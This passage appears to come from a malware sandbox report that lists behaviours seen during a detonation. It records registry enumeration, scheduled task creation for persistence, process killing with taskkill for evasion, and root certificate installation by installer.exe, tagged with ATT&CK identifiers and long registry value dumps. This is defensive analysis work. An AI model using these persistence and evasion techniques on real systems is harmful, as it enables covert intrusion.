Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4060 schtasks.exe
6208 schtasks.exe
6200 schtasks.exe
4388 schtasks.exe
1948 schtasks.exe

pid	process
4060	schtasks.exe
6208	schtasks.exe
6200	schtasks.exe
4388	schtasks.exe
1948	schtasks.exe

Enumerates system info in registry 2 TTPs 55 IoCs

Query Registry

System Information Discovery

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exechkdsk.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exechkdsk.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	chkdsk.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	chkdsk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

29792 taskkill.exe
1312 taskkill.exe
6556 taskkill.exe
2376 taskkill.exe
880 taskkill.exe
5040 taskkill.exe
3692 taskkill.exe
7860 taskkill.exe

pid	process
29792	taskkill.exe
1312	taskkill.exe
6556	taskkill.exe
2376	taskkill.exe
880	taskkill.exe
5040	taskkill.exe
3692	taskkill.exe
7860	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

Processes:

chkdsk.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	chkdsk.exe

Modifies data under HKEY_USERS 22 IoCs

Processes:

msiexec.exesvchost.exemsiexec.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\9	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\WnfLastTimeStamps\WNF_LIC_HARDWAREID_IN_DEVICE_LICENSE_IN_TOLERANCE = "1636095335"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"159\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.Default\Software\Microsoft\IdentityCRL\WnfLastTimeStamps	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7	msiexec.exe

Modifies registry class 15 IoCs

Processes:

Calculator.exeExplorer.EXEmsedge.exemsedge.exeCalculator.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{7CCB2BE6-7296-4781-B78A-7781E2EE511B}	Calculator.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{6853B984-EBF3-4876-BF28-FD54DD2F5DE1}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{8389BB9A-6DA5-4542-9927-3A2DF7F6D6B9}	Calculator.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage	msedge.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

installer.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
